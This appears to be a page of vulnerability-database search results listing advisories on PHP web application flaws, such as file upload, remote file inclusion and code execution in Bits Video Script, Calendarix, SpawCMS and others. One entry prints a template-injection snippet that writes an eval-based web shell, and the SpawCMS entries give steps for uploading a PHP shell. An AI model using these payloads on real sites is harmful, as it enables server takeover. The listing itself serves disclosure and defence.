7206 matches found
SA-CONTRIB-2010-015 - Signwriter - Arbitrary code execution
The Signwriter module allows the use of TrueType fonts to replace text in headings, blocks, menus and filtered text. This vulnerability allows a remote attacker with the ability to create content using an input filter created with a Signwriter profile to execute arbitrary PHP code on an affected...
TinyBrowser Component for Joomla! 'tinybrowser_lang' Cookie Local File Include
The version of the TinyBrowser component for Joomla! running on the remote host is affected by a local file include vulnerability due to improper sanitization of user-supplied input to the 'tinybrowser_lang' cookie before using it in the tinymce/plugins/tinybrowser/folders.php script to include PH...
Bits Video Script 2.04/2.05 - addvideo.php Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - addvideo.php Arbitrary File Upload / Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...
Bits Video Script 2.04/2.05 - '/register.php' Arbitrary File Upload / Arbitrary PHP Code Execution
source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...
Bits Video Script 2.04/2.05 - register.php Arbitrary File Upload / Arbitrary PHP Code Execution
Bits Video Script 2.04/2.05 - register.php Arbitrary File Upload / Arbitrary PHP Code Execution source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can...
Bits Video Script 2.04/2.05 - '/addvideo.php' Arbitrary File Upload / Arbitrary PHP Code Execution
source: https://www.securityfocus.com/bid/40712/info Bits Video Script is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to upload arbitrary code and run it in the context of the...
Supesite7 the background to get shell-vulnerability warning-the black bar safety net
PHP code !-- eval $content = "@eval$POSTc";-- !-- eval $test1 = ""."?"." php ".$ content."?& gt;";-- !-- eval fputsfopenSROOT.'./ templates/default/modelcache.php','w+',$test1;-- Edit the template when writing these few lines,disassemble the written word,on the line...
phpwind 7.5 apps/groups/index.php remote file inclusion vulnerability
In apps/groups/index.php the $route and $basePath variables are not initialized, which allows remote or local inclusion of PHP files and leads to execution of arbitrary PHP code. <?php if ($route == "groups") require_once $basePath . '/action/mgroups.php'; elseif ($route == "group") require_once $basePath . '/action/mgroup.php'; elseif ($route == "galbum") require_once $basePath . '/action/mgalbum.php';...
Calendarix 0.7 - 'calpath' Remote File Inclusion
source: https://www.securityfocus.com/bid/37673/info Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the...
Calendarix 0.7 - calpath Remote File Inclusion
Calendarix 0.7 - calpath Remote File Inclusion source: https://www.securityfocus.com/bid/37673/info Calendarix is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containi...
phpLDAPadmin < 1.2 Local File Inclusion
SpawCMS Editor Shell Upload Vulnerability
No description provided by source. Author: j4ck j4ck from elitehackers.pl just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected directory...
SpawCMS Editor - Arbitrary File Upload
SpawCMS Editor - Arbitrary File Upload Author: j4ck j4ck from elitehackers.pl just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected...
SpawCMS Editor Shell Upload Vulnerability
Exploit for unknown platform in category web applications. SpawCMS Editor Shell Upload Vulnerability: just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can...
SpawCMS Editor - Arbitrary File Upload
Author: j4ck j4ck from elitehackers.pl just go to directory http:/server/path/spaw/demo.php then use image Upload, select all filetypes, and You can upload your evil PHP code, for example phpshell. Shell will be uploaded to selected directory...
Remote file inclusion
PHP remote file inclusion vulnerability in index.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to execute arbitrary PHP code via a URL in the lng parameter. NOTE: this can also be leveraged to include and execute arbitrary local files via .. (dot dot) sequences...
CVE-2009-4543
PHP remote file inclusion vulnerability in index.php in Cromosoft Technologies Facil Helpdesk 2.3 Lite allows remote attackers to execute arbitrary PHP code via a URL in the lng parameter. NOTE: this can also be leveraged to include and execute arbitrary local files via .. (dot dot) sequences...
PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion
PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion source: https://www.securityfocus.com/bid/37559/info Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploi...
PhotoKorn 1.542 - Cross-Site Scripting / Remote File Inclusion
source: https://www.securityfocus.com/bid/37559/info Photokorn is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker can exploit these issues to execute malicious PHP code in the context o...
Remote file inclusion
Multiple PHP remote file inclusion vulnerabilities in PHPope 1.0.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[config][dir][plugins] parameter to plugins/address/admin/index.php, (2) GLOBALS[config][dir][functions] parameter to plugins/im/compose.php, and (3)...